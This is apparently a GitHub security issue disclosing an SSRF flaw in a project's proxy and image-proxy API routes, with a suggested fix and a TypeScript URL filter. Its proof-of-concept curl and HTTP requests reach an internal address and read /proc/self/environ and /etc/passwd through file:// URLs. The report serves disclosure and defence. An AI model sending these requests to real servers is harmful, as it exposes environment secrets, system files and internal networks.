[BUG] Security Vulnerability #1128

@0x1f

Description

The GET function in the components apps/sim/app/api/proxy/route.ts and apps/sim/app/api/proxy/image/route.ts does not filter and judge the parameters in the request, resulting in an SSRF security issue.

POC

  • Request
curl "http://localhost:3000/api/proxy?url=http://172.17.0.1:9999&method=POST&body=1&header.12=test12&header.Content-Type=12222222222222"
  • Response
Image
  • Request
curl "http://localhost:3000/api/proxy/image?url=https://example.com"
  • Response
Image

Since the bun component supports file protocol access, the vulnerability can be used to access local files.

Image
  • Request
curl "http://localhost:3000/api/proxy?url=file:///proc/self/environ&method=POST"
  • Response
Image
  • Request
GET /api/proxy/image?url=file:///etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.105 Safari/537.36 Vivaldi/1.0.162.9
Accept: */*
Host: localhost:3000
  • Response
Image

Impact

  • Read cloud metadata to obtain credentials and even take over cloud infrastructure.
  • Access intranet systems.
  • Read local file information.

Suggestions

Before calling fetch, create a filter to determine whether the request URL is legal, and disable the file protocol so that local files cannot be accessed (determine whether the URL field starts with http or https; if not, discard the request).
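
One way to write the filter suggested above, as an added example that is not code from the project or the reporter. It goes beyond the scheme check and also rejects loopback, private and link-local hosts, because the Impact list includes intranet and cloud-metadata access; the names `checkProxyUrl` and `isBlockedAddress` are hypothetical.

```typescript
// Added example; helper names are hypothetical, not taken from the project.
// IPv4 ranges the proxy must never reach: [network, prefix length].
const BLOCKED_V4: Array<[string, number]> = [
  ["0.0.0.0", 8], ["10.0.0.0", 8], ["100.64.0.0", 10], ["127.0.0.0", 8],
  ["169.254.0.0", 16], // link-local, where cloud metadata services live
  ["172.16.0.0", 12], ["192.168.0.0", 16],
];

function v4ToInt(ip: string): number | null {
  const parts = ip.split(".");
  if (parts.length !== 4) return null;
  let n = 0;
  for (const p of parts) {
    if (!/^\d{1,3}$/.test(p) || Number(p) > 255) return null;
    n = n * 256 + Number(p);
  }
  return n;
}

function isBlockedV4(ip: string): boolean {
  const addr = v4ToInt(ip);
  if (addr === null) return false; // not an IPv4 literal
  return BLOCKED_V4.some(([net, bits]) => {
    const base = v4ToInt(net)!;
    return addr >= base && addr < base + Math.pow(2, 32 - bits);
  });
}

// Use on literal hosts and on every address DNS returns before connecting.
function isBlockedAddress(host: string): boolean {
  const h = host.replace(/^\[|\]$/g, "").toLowerCase();
  if (h.indexOf(":") === -1) return isBlockedV4(h);
  if (h === "::" || h === "::1") return true; // unspecified, loopback
  const first = parseInt(h.split(":")[0] || "0", 16);
  if ((first & 0xfe00) === 0xfc00 || (first & 0xffc0) === 0xfe80) return true; // ULA, link-local
  const m = h.match(/^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/); // IPv4-mapped
  if (!m) return false;
  const hi = parseInt(m[1], 16), lo = parseInt(m[2], 16);
  return isBlockedV4([hi >> 8, hi & 255, lo >> 8, lo & 255].join("."));
}

function checkProxyUrl(raw: string): { ok: boolean; reason?: string } {
  let url: URL;
  try { url = new URL(raw); } catch { return { ok: false, reason: "unparseable URL" }; }
  if (url.protocol !== "http:" && url.protocol !== "https:")
    return { ok: false, reason: "scheme not allowed" };
  if (/(^|\.)localhost\.?$/.test(url.hostname) || isBlockedAddress(url.hostname))
    return { ok: false, reason: "internal address" };
  return { ok: true };
}
```

This check only sees the host as written in the URL: a route handler would also need to resolve DNS names and pass each resolved address through `isBlockedAddress`, and to re-run the check on every redirect target instead of following redirects automatically.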
